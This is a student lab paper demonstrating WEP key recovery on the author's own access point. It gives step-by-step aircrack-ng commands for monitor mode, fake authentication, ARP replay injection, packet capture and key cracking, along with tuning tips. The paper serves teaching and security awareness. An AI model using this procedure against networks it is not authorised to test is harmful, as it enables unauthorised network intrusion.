WEP Vulnerability Testing Wired Equivalent Privacy ...

WEP Vulnerability Testing

Wired Equivalent Privacy Vulnerability Testing Mark Diehl Webster University


2

Contents Abstract ........................................................................................................................................... 3 Intro ................................................................................................................................................. 4 Hardware and software ................................................................................................................... 4 Attacker Operating System ......................................................................................................... 5 Client Operating System ............................................................................................................. 5 Wireless Adapter ......................................................................................................................... 5 Access Point ................................................................................................................................ 6 Aircrack-ng Software Suite......................................................................................................... 6 Airmon-ng ................................................................................................................................... 6 Airodump-ng ............................................................................................................................... 6 Aireplay-ng ................................................................................................................................. 7 Aircrack-ng ................................................................................................................................. 7 Process ............................................................................................................................................ 8 Step 1 .......................................................................................................................................... 8 Step 2 .......................................................................................................................................... 9 Step 3 ........................................................................................................................................ 10 Step 4 ........................................................................................................................................ 10 Step 5 ........................................................................................................................................ 11 Results ........................................................................................................................................... 12 Step 1 ........................................................................................................................................ 12 Step 2 ........................................................................................................................................ 12 Step 3 ........................................................................................................................................ 12 Step 4 ........................................................................................................................................ 13 Step 5 ........................................................................................................................................ 13 Conclusion .................................................................................................................................... 13 References ..................................................................................................................................... 14 Acknowledgements ....................................................................................................................... 15


3

Abstract In this experiment I will setup a WEP encrypted wireless access point and then use the Aircrackng software suite to extract the key from captured packets. I will employ previously demonstrated methods of breaking WEP encryption and explain how each process works. This experiment will demonstrate why wireless networks that use WEP encryption are virtually unprotected.


4 Intro

The following chart shows the current state of wireless network security of 424 businesses in the North America. Finneran’s study for InformationWeek shows that of the 424 respondents, excluding those that use no wireless security, 64 (15%) of them are virtually unprotected because they use antiquated WEP encryption (Finneran, 2013).

73 64

2012 2013

24 15 10

9 2

WPA2

WEP

Other

3

None

Figure A Wireless LAN Security

This experiment is designed to show how easily one can recover a WEP key and access a supposedly protected wireless network. The results of this experiment demonstrate the wellknown fact that breaking WEP encryption is fast, cheap, and easy. Hardware and software This section describes the hardware and software selected for the experiment. All hardware and software was already owned by the researcher at the time of the experiment and some of the equipment is nearly 5 years old. Excluding the client and attacker operating systems


5

and machines the total cost of this experiment is estimated at 55 USD, well within any war driver’s price range. Attacker Operating System A Live USB installation of Ubuntu 13.10, a derivative of Linux, was selected as the operating system for this experiment (Canonical Ltd., 2013). The OS was installed on a 4GB USB 2.0 flash drive using the UnetBootIn application. This OS serves as the attacker in this experiment and all WEP cracking software will execute on this OS. The OS was free but the cost of the USB flash drive is estimated to be 10 USD. Client Operating System The client managing the access point is running the Windows 8.1 Pro OS on a Microsoft Surface Pro. This client machine plays the part of the network administrator and will be used to manage the access point service set identifier (SSID) and WEP key as well as generate network traffic. Wireless Adapter The wireless adapter selected for this experiment is a Sanoxy WA-U150W. This adapter features the RealTek RTL8188CU chipset which allows the adapter to use drivers that allow packet injection, and follows standards IEEE 802.11b/g/n. The adapter’s MAC address is 00:9E:95:9C:48:AF; finding the adapter’s MAC address will be covered in step 3 of the process. The wireless adapter was purchased at 15 USD.


6

Access Point The access point selected for this experiment is a D-Link DIR-615. It offers a full management dashboard where an administrator or user can change the SSID and WEP key. The dashboard can be accessed by browsing to 192.168.0.1 in an internet browser. The Admin login will not be password protected for this experiment. The access point’s MAC address is 00:1E:58:F4:9B:3B. The access point cost approximately 30 USD. Aircrack-ng Software Suite The Aircrack-ng software suite contains nearly 20 programs designed to monitor, capture, and inject network traffic and recover WEP and WPA-PSK keys. Only 4 programs were required to complete this experiment. The programs needed were airmon-ng, airodump-ng, aireplay-ng, and aircrack-ng. All tools are available for free on Linux operating systems from aircrack-ng.org (aircrack-ng, 2013). Airmon-ng This script is used to enable monitor mode on wireless interfaces. These interfaces can then be used to monitor and inject packets into the network. Not all wireless adapter chipsets support monitor mode. The RealTek chipset present in the Sanoxy wireless adapter is the main reason for its selection (aircrack-ng, 2013). Airodump-ng This script is used to capture network packets generated by the aireplay-ng script and is well suited to collecting WEP initialization vectors (IVs). Once enough IVs have been collected they can be used in the aircrack-ng program (aircrack-ng, 2013).


7

Aireplay-ng Aireplay-ng is used to inject frames for the purpose of generating network traffic. It has several modes of operation. The modes used in this experiment are injection testing, fake authentication, and ARP request replay attack. The injection test determines if an interface can inject packets and fake authentication associates an interface with an access point to allow for various aireplay-ng attacks. The ARP request replay attack is the most effective way to generate IVs. The program listens for an ARP packet and then retransmits it back to the access point. This causes the access point to repeat the ARP with a new IV. Collecting packets continues until enough IVs are available for aircrack-ng to crack the network key (aircrack-ng, 2013). Aircrack-ng Aircrack-ng is a WEP and WPA/WPA2 key cracking program. It can recover a WEP key once enough encrypted packets have been captured with airodump-ng. Aircrack-ng determines WEP keys by first employing statistical methods to get the key into a “ball park range” and then use brute force to complete the key. The statistical techniques are based on the fact that certain IVs “leak” the WEP key for particular key bytes. Using statistical mathematics, the possibility that a certain byte is the correct key goes up when the right IV is captured for a particular key byte. Aircrack-ng then performs a series of tests resulting in accumulated votes for each key byte until the most probable key for each byte has been found. Aircrack-ng will then test the key to confirm it. The more IVs that have collected the less time aircrack-ng needs to spend brute forcing the WEP key. The key has been limited to 64 bits for the sake of time. Cracking a WEP key can require up to 250,000 IVs generated at a rate of about 3,000 every minute. Once enough IVs have been collected aircrack-ng can recover the WEP key in less than 1 minute (aircrack-ng, 2013).


8 Process

This section will describe the steps I took in breaking WEP encryption. All terminal entries must be rooted first with sudo –s before scripts will execute. This command gives all subsequent commands administrator privileges to execute. Step 1 The first step involves using airmon-ng to create a new wireless interface and then set the new interface to monitor mode. This mode allows the wireless adapter to sniff for and inject data packets when associated with an access point (AP). Depending on the drivers being used, this process could result in one of several interfaces being created. The Atheros drivers produce an interface called ath0, Madwifi drivers produce wifi0 interfaces and RealTek drivers produce mon0. The drivers and chipset used in this experiment were RealTek, thus this first step results in the creation of interface mon0. This interface name will be referred to when an interface is required is subsequent steps. Terminal input: airmon-ng stop wlan0 airmon-ng start wlan0 [AP Channel]

It is recommended to use aireplay-ng to test the interface’s ability to inject packets into the network. This test may be conducted against a specific access point or against all access points in range of the adapter. In the syntax of aireplay-ng, -9 will start the injection test.


9

Terminal input: aireplay-ng -9 mon0

The results of this test will provide the access point’s SSID, MAC address, and channel. If the wireless interface set up in step 1 does not match the access point’s channel then it must be changed using (Wireless Defence, 2013): iwconfig mon0 channel [channel number]

Step 2 Airodump-ng should be started to capture packets. The user must know the wireless adapter channel, access point MAC address, a capture file prefix, and an interface in monitor mode. The adapter channel and access point MAC address were determined in the injection test in step 1. The capture file prefix should be a unique identifier specific to the experiment being conducted. Terminal input: airodump-ng -c [adapter channel] --bssid [AP MAC] -w [capture file prefix] mon0

This terminal will be dedicated to the airodump-ng processes until the experiment is complete. Subsequent steps will require a new terminal.


10

Step 3 The next step is to fake an authentication and association with the access point using aireplay-ng. This step requires the access point SSID, access point MAC address, the wireless interface MAC address, and an interface. Terminal input: aireplay-ng -1 0 -e [AP SSID] -a [AP MAC] -h [interface MAC] mon0

In the syntax of aireplay-ng, -1 0 refers to an association request to be repeated every 0 seconds. The access point SSID and MAC address were found in the injection test in step 1 and the wireless interface MAC address can be found using: ip addr

In a case where an access point is not broadcasting the SSID there are steps to take using aireplay-ng, but for this experiment the access point was set to broadcast the SSID (Wireless Defence, 2013). Step 4 The next step is generating new IVs for airodump-ng to collect. Aireplay-ng is used to start an ARP request replay attack. The access point MAC address, interface MAC address, and an interface in monitor mode from previous steps will be used.


11

Terminal input: aireplay-ng -3 -b [AP MAC] -h [interface MAC] mon0

Aireplay-ng will start generating new IVs in a few minutes and will produce around 3,000 every minute it continues to run. In the syntax of aireplay-ng, -3 will start the ARP request replay attack. This terminal will be dedicated to the aireplay-ng processes until the experiment is complete. Subsequent steps will require a new terminal. Step 5 Once enough IVs have been collected aircrack-ng can start decrypting the captured packets. A 64 bit key would require as many as 250,000 IVs to recover the key. Terminal input: aircrack-ng -a 1 -1 -n [Key length] -b [AP MAC] [capture file prefix]*.cap

Aircrack-ng allows for several switches to optimize the key search. The switch -a 1 will force the statistical techniques to search for a WEP key, -1 will limit the program to a one time search, -n lets the user limit the key length during searches, and -b limits the search to IVs generated from a specific access point. The capture file prefix should match the prefix set in step 2 with airodump-ng. The capture files contain the IVs captured with airodump-ng. If enough IVs have been generated then aircrack-ng should only take about a minute to recover the WEP key. Upon recovery failure, the user must wait for more IVs and then make another attempt.


12 Results

The results section will document the results of each step of the process as I performed the experiments. Critical facts or processes will be noted for reference in future experiments. Step 1 When I first started testing my wireless adapter’s ability to inject packets I was finding that it was incapable of entering monitor mode. I had to patch the IEEE 802.11 drivers per aircrack-ng.org’s instructions for my specific chipset. Afterwards I was able to successfully inject packets without issue. Step 2 A few things to note about this step are the channel requirements and the capture file prefix. The wireless adapter must be listening on the same channel as the access point or the next steps will fail. I found that if used the same prefix as past tests then all the old capture files along with newly generated capture files would be used in the aircrack-ng program. I found success in coming up with a unique name for the capture files for each test. Step 3 I attempted to run an experiment when the access point was not broadcasting the SSID and found that I was unable to efficiently find the access point name. Wireless Defence provides a method of finding an access point’s SSID by disassociating an associated client and then listening for the handshake request (Wireless Defence, 2013). I found that adding this step did little to further the overall goal of the experiment. I conducted all further experiments with the access point continuously broadcasting the SSID.


13

Step 4 I found the operation of aireplay-ng to vary depending on the number of clients associated with the access point. My initial tests had no associated clients and aireplay-ng generated approximately 10 IVs per second. This meant that collecting enough IVs to recover the WEP would take 25 - 30 minutes. I found that if I associated only a single client with the access point that IVs were being generated at a rate of approximately 40 per second giving me all the IVs I needed in just over 6 minutes. I found that for a 64 bit WEP key I needed between 12,000 and 18,000 IVs to perform a successful recovery. Step 5 Aircrack-ng offers a wide array of switches to optimize its cracking performance key length limiters to dictionary files to fudge factors. The fudge factor determines at what point aircrack-ng will start trying brute force to find the key. I found that limiting the key length to 64 bits, limiting the statistical methods to only attempt to solve for WEP keys, filtering the IVs by the access point’s MAC address, and increasing the fudge factor really sped up the process. Aircrack-ng was able to find the WEP key in under a minute with only about 5% of the recommended 250,000 IVs. Conclusion This experiment has demonstrated how an inexperienced Linux user can easily break into a WEP protected wireless network. While my results show that WEP networks are practically wide open, it appears that within the next few years WEP networks will be a thing of the past. Their use has dropped to nearly 60% of what it was a year ago. I estimate that if the current trend continues that the number of WEP networks will be insignificant within 5 years.


14 References

aircrack-ng. (2013, December). aircrack-ng.org. Retrieved from Simple WEP crack: http://www.aircrack-ng.org/doku.php?id=simple_wep_crack Canonical Ltd. (2013, December). Download Ubuntu Desktop. Retrieved from ubuntu.com: http://www.ubuntu.com/download/desktop Finneran, M. (2013, June). 2013 State of Mobile Security. Retrieved from reprots.informationweek.com: http://reports.informationweek.com/abstract/18/10935/Mobility-Wireless/Research:2013-State-Of-Mobile-Security.html Wireless Defence. (2013, December). wirelessdefence.org. Retrieved from http://www.wirelessdefence.org/Contents/LinuxWirelessCommands.htm


15 Acknowledgements

To Samantha, for putting up with my “rage mornings” after I pulled multiple all-nighters researching this topic and running multiple hour long experiments. Yes, I know our wireless network sucks. Thanks for being the level-headed one and for being my better half. To Al, for allowing me to explore my own interests in the computer security field and being open to the idea in the first place. Were it not for your support my research would have ended up becoming some banal reproduction of commonly known facts and figures. I look forward to expanding my research into other areas of computer security. Thank you. To Tom, for knowing way more on every topic I would ever be interested in and for teaching me, albeit implicitly, that a simple answer usually isn’t the best answer. To Chris, for setting me on my path at Webster that has ultimately led me to where I am now professionally, academically, and personally. I don’t know what would have become of me had you not stopped me that fateful day at the printer. Thanks! And finally to Nooter Eriksen, for overlooking my rogue access point, thanks.